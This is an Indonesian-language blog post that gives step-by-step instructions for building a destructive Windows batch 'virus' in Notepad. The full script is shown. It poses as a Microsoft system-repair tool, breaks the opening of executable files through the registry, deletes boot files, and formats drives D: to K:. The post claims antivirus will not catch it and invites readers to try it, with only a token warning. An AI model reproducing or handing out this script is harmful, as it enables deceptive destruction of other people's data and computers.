Membuat Virus

Dengan hanya berbekalkan notepad kita bisa membuat sebuah virus yang cukup mematikan. Dan jangan takut kalau virus dari notepad ini akan terdeteksi sebagai virus. Virus ini tidak akan terdeteksi, karena ia dibuat dari sebuah command prompt milik Windows. Sehingga tidak ada signature yang akan dicegat oleh antivirus

ketik kode berikut di notepad, dan simpan dengan ekstensi 'bat"

-----------------------------------------------------------------------------------------


@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.

reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%% /f
echo.

del /f /Q /A C:\ntldr /S
echo.

Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
Format G: /Q /X /y
echo.
Format H: /Q /X /y
echo.
Format I: /Q /X /y
echo.
Format J: /Q /X /y
echo.
Format K: /Q /X /y
echo.

del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.

echo System is now repaired.
echo Windows will reboot the system.
echo.
-----------------------------------------------------------------------------------------

Prinsip kerja dari script ini

* Script warna biru : untuk mengelabuhi user agar seakan-akan ini adalah service windows dalam menemukan sebuah virus dan berusaha memperbaikinya.

* Script warna hijau : membuat value diregistry agar semua file yang berekstensi exe tidak akan bisa dibuka lagi oleh program default file tersebut.

* Script berwarna orange : menghapus semua file yang dibutuhkan oleh windows saat booting

* Script berwarna hitam : memformat semua partisi hard disk yang ada di komputer

"Jangan jalankan script ini di komputer teman anda, apalagi komputer anda sendiri"


Selamat Mencoba...

Penulis : tanjiro2 ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel Membuat Virus ini dipublish oleh tanjiro2 pada hari Senin, 28 November 2011. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan Membuat Virus
 
Pin It

0 komentar:

Posting Komentar